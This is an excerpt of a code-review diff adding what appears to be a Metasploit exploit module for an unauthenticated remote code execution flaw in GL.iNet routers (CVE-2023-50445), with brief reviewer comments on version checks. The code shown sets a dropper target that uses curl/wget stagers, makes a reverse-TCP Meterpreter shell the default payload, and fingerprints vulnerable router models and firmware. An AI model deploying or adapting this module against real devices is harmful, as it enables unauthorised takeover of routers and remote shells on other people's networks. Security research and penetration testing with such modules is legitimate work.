modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb

```diff
@@ -0,0 +1,255 @@
+              'Arch' => [ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne'],
+              'Linemax' => 900,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('SID', [false, 'Session ID'])
+    ])
+  end
+
+  def vuln_version?
+    @glinet = { 'model' => nil, 'firmware' => nil, 'arch' => nil }
+    # check first with version 4.x api call
+    post_data = "{\"jsonrpc\":\"2.0\",\"id\":#{rand(1000..9999)},\"method\":\"call\",\"params\":[\"\",\"ui\",\"check_initialized\",{}]}"
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'text/json',
+      'uri' => normalize_uri(target_uri.path, 'rpc'),
+      'data' => post_data.to_s
+    })
+    if res && res.code == 200 && res.body.include?('result')
+      res_json = res.get_json_document
+      unless res_json.blank?
+        @glinet['model'] = res_json['result']['model']
+        @glinet['firmware'] = res_json['result']['firmware_version']
+      end
+    else
+      # check with version 3.x api call. These versions are NOT vulnerable
+      res = send_request_cgi({
+        'method' => 'GET',
+        'ctype' => 'application/x-www-form-urlencoded',
+        'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'api', 'router', 'model')
+      })
+      if res && res.code == 200 && res.body.include?('model')
+        res_json = res.get_json_document
+        unless res_json.blank?
+          @glinet['model'] = res_json['model']
+          @glinet['firmware'] = '3.x'
+        end
+      end
+    end
+
+    # check for the vulnerable models and firmware versions
+    case @glinet['model']
+    when 'ar750', 'ar750s', 'ar300m', 'ar300m16'
+      @glinet['arch'] = 'mipsbe'
+      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')
+    when 'mt300n-v2', 'mt1300'
+      @glinet['arch'] = 'mipsle'
+      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')
+    when 'ap1300', 'b1300'
+      @glinet['arch'] = 'armle'
+      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')
+    when 'e750', 'e750v2'
+      @glinet['arch'] = 'mipsbe'
+      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8')
+    when 'mv1000'
+      @glinet['arch'] = 'armle'
+      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8')
+    when 'ax1800', 'axt1800', 'mt2500', 'mt2500a', 'mt3000', 'a1300'
```

Comment:
Shouldn't those be `>=` instead of `==`?

Reply:
Nope, there is no other version that is vulnerable.

Reply:
I sent some suggestions to replace `=>` with `:` in the description :P